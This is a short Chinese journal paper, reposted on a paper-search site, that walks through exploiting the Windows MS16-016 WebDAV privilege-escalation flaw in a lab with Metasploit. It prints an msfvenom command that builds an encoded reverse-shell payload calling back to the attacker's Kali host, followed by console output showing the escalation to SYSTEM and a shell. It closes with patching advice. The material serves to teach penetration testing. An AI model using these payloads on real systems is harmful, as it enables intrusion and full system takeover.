网站首页  词典首页

请输入您要查询的论文:

 

标题 基于Metasploit的MS16-016本地溢出漏洞利用实战
范文

    赵秋

    

    

    

    摘要: 该文对MS16-016本地溢出漏洞做了简单介绍,文中分析了利用MS16-016本地溢出漏洞,渗透到Windows 7中并获取系统权限的实现方式,最后给出了对应的防范措施。

    关键词: Metasploit;MS16-016;本地溢出漏洞

    中图分类号:TP393? ? ? 文献标识码:A? ? ? 文章编号:1009-3044(2018)31-0216-01

    1 漏洞介绍

    MS16-016这个漏洞是由于Windows中的WebDAV未正确处理WebDAV客户端发送的信息导致的。若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应用程序,从而控制受影响的系统。此漏洞存在于在:Windows Vista SP2、Windows Server 2008 x86 & x64、Windows Server 2008 R2 x64、Windows 7 x86 & x64、Windows 8.1 x86 & x64。系统中提升权限至系统权限,以下系统中导致系统拒绝服务(蓝屏):Windows Server 2012、Windows Server 2012 R2、Windows RT 8.1、Windows 10。

    2 MS16-016本地溢出漏洞利用的实现

    下面介绍在Kali中渗透Windows 7 x86的实现。Kali的IP地址为10.3.81.106,Windows 7 x86的IP地址为10.3.81.152,使用虚拟机kali 中的Metasploit利用MS16-016本地溢出漏洞对Windows 7的进行渗透,从而获得系统权限。

    1) 在Kali上生成连接软件msf.exe,LHOST为Kali的IP地址

    [email protected]:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.3.81.106 LPORT=4444 -f exe > msf.exe

    2)在命令行下输入“msfconsole”,进入MSF的启动界面

    [email protected]:~# msfconsole

    3)在Metasploit命令提示符下,使用use命令载入监听模块。设置payload为windows/meterpreter/reverse_tcp。设置本地监听主机IP地址为Kali的IP。可以使用show options查看相关参数,输入exploit命令开始监听。

    4)将软件msf.exe发给Windows 7上运行,此时kali上会有连接提示,可以看见MSF弹回了一个session 1(会话连接)。接着,在Meterpreter Shell中利用getuid命令查看已获得的权限为user权限。我们要把它提升到system权限,即Windows最高权限。

    5)输入命令background,把当前的metasploit shell转为后台执行。选择MS16-016这个漏洞在进行提权,同时设置刚才连接的ID为1。最后,执行exploit命令進行提权,可以看到成功的把漏洞利用到了PID为2872的进程中。

    6)虽然提权成功了,但连接到的ID为1的会话连接中,执行getuid命令还是看见的是user权限。

    msf exploit(windows/local/ms16_016_webdav) > sessions -i 1

    [*] Starting interaction with 1...

    meterpreter > getuid

    Server username: cmx-PC\cmx

    7)使用migrate 命令,迁移到该进程ID中。

    meterpreter > migrate 2872

    [*] Migrating from 4068 to 2872...

    [*] Migration completed successfully.

    8)然后执行getuid命令再次查看权限,可以看到已经是系统权限了,输入shell测试。

    meterpreter > getuid

    Server username: NT AUTHORITY\SYSTEM

    meterpreter > shell

    Process 608 created.

    Channel 1 created.

    Microsoft Windows [版本 6.1.7601]

    版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

    C:\Users\cmx\Desktop>

    3 MS16-016本地溢出漏洞的防御

    你也可以通过 Windows 更新获取此更新程序。在你开启自动更新后,系统会自动下载并安装此更新程序。https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2016/ms16-016用户可从此获取独立的更新程序包。此安全更新程序通过更正WebDAV验证输入的方式来修复这个漏洞。

    参考文献:

    [1] 祝烈煌,张子剑.网络攻防实战研究漏洞利用与提权[M].北京:电子工业出版社,2018.

    [2][英]Nipun Jaswal,李华峰.精通Metasploit渗透测试[M]. 2版.北京:人民邮电出版社,2017.

    [3] http://www.freebuf.com/vuls/95950.html.

随便看

 

科学优质学术资源、百科知识分享平台,免费提供知识科普、生活经验分享、中外学术论文、各类范文、学术文献、教学资料、学术期刊、会议、报纸、杂志、工具书等各类资源检索、在线阅读和软件app下载服务。

 

Copyright © 2004-2023 puapp.net All Rights Reserved
更新时间:2025/3/13 18:39:46